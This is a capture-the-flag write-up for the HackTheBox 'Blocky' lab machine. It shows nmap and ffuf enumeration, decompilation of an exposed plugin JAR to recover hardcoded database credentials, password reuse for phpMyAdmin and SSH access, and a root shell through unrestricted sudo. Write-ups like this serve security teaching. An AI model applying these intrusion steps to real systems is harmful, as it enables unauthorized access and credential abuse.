HackTheBox - Blocky

Updated 29-03-2026
#htb #hackthebox #ctf #writeup #linux #ssh #apache #password-reuse #wordpress #ftp #minecraft #directory-enumeration #jar-decompilation #jadx #java #hardcoded-credentials #phpmyadmin #sudo-abuse #privilege-escalation #ubuntu

A retro Linux box running a Minecraft-themed WordPress site — a forgotten plugin file hiding in plain sight contains the keys to the whole machine.

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ ip=10.129.17.214; ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//); nmap -p$ports -sC -sV $ip
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-28 03:34 -0400
Nmap scan report for 10.129.17.214
Host is up (0.22s latency).

PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp?
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://blocky.htb
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 256.59 seconds

Four ports of interest:

  • 21/tcp — FTP, open but unversioned
  • 22/tcp — OpenSSH 7.2p2
  • 80/tcp — Apache 2.4.18 redirecting to blocky.htb
  • 25565/tcp — Minecraft 1.11.2 server

Foothold

Hosts File

1
$ echo '10.129.17.214 blocky.htb' | sudo tee -a /etc/hosts

WordPress Fingerprinting

The site is a WordPress blog. whatweb confirms the version:

1
2
$ whatweb http://blocky.htb                                                                  
http://blocky.htb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.17.214], JQuery[1.12.4], MetaGenerator[WordPress 4.8], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[BlockyCraft – Under Construction!], UncommonHeaders[link], WordPress[4.8]

Directory Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
$ ffuf -c -u http://blocky.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt                  

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://blocky.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/dirb/wordlists/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

                        [Status: 200, Size: 52227, Words: 3306, Lines: 314, Duration: 599ms]
.htpasswd               [Status: 403, Size: 294, Words: 22, Lines: 12, Duration: 3631ms]
.htaccess               [Status: 403, Size: 294, Words: 22, Lines: 12, Duration: 4596ms]
.hta                    [Status: 403, Size: 289, Words: 22, Lines: 12, Duration: 4598ms]
index.php               [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 230ms]
javascript              [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 127ms]
phpmyadmin              [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 136ms]
plugins                 [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 155ms]
server-status           [Status: 403, Size: 298, Words: 22, Lines: 12, Duration: 128ms]
wiki                    [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 137ms]
wp-admin                [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 127ms]
wp-content              [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 135ms]
wp-includes             [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 206ms]
xmlrpc.php              [Status: 405, Size: 42, Words: 6, Lines: 1, Duration: 474ms]
:: Progress: [4614/4614] :: Job [1/1] :: 18 req/sec :: Duration: [0:00:30] :: Errors: 0 ::

The plugins/ directory is publicly accessible and contains BlockyCore.jar — a compiled Minecraft plugin.

JAR Decompilation — Hardcoded Credentials

Download and extract the JAR:

1
2
3
4
$ unzip BlockyCore.jar
Archive:  BlockyCore.jar
  inflating: META-INF/MANIFEST.MF    
  inflating: com/myfirstplugin/BlockyCore.class

Decompile the bytecode with jadx:

1
2
3
4
$ sudo jadx /home/kali/Downloads/com/myfirstplugin/BlockyCore.class -d /home/kali/Downloads/com/myfirstplugin/output 
INFO  - loading ...
INFO  - processing ...
INFO  - done

The decompiled source exposes hardcoded SQL credentials:

1
2
3
4
5
6
7
8
9
10
$ cat BlockyCore.java 
package com.myfirstplugin;

/* JADX INFO: loaded from: BlockyCore.class */
public class BlockyCore {
    public String sqlHost = "localhost";
    public String sqlUser = "root";
    public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
    
<--SNIP-->

phpMyAdmin — WordPress User Discovery

The phpmyadmin directory found during enumeration is accessible. Logging in with root:8YsqfCTnvxAUeduzjNSXe22 works and reveals the wordpress database. The wp_users table exposes one account:

1
Notch:$P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/

The hash uses WordPress’s MD5-based format. Cracking it with rockyou.txt fails, but the SQL password itself turns out to be reused for SSH.

SSH Access

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ ssh notch@blocky.htb            
The authenticity of host 'blocky.htb (10.129.17.214)' can't be established.
ED25519 key fingerprint is: SHA256:ZspC3hwRDEmd09Mn/ZlgKwCv8I8KDhl9Rt2Us0fZ0/8
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'blocky.htb' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
notch@blocky.htb's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Fri Jul  8 07:24:50 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

notch@Blocky:~$

The user flag is accessible from here.

Privilege Escalation

Unrestricted Sudo

1
2
3
4
5
6
7
notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

notch can run any command as root. Escalate directly:

1
2
notch@Blocky:~$ sudo bash -p
root@Blocky:~#